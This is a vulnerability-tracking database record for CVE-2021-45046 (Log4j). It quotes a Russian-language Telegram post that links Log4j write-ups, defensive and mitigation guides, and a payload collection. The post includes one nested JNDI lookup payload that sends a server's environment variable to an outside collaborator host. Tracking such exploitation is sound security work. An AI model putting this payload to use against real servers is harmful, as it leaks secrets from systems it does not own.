{"uuid": "a24f6248-24cc-4076-a662-240cb0e87022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/beaverdreamer/36", "content": "#log4j #slowpoke\n\u041e\u0431\u0449\u0438\u0435 \u0441\u0442\u0430\u0442\u044c\u0438:\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n\n\u0421\u0442\u0430\u0442\u044c\u044f \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b (\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0437\u044f\u0442\u044c \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432):\nhttps://securityblue.team/log4j-hunting-and-indicators/\n\n\u041e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b: https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide\n\nJDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. \n\n\nIn case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like\n ${jndi:ldap://${env:user}.xyz.collab.com/a} \nWill leak server side env vars!\n\n\u0412\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432:\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/0d6d6049ce03272d6e934247ab57263bc04ea625/CVE%20Exploits/Log4Shell.md", "creation_timestamp": "2024-03-04T10:40:25.000000Z"}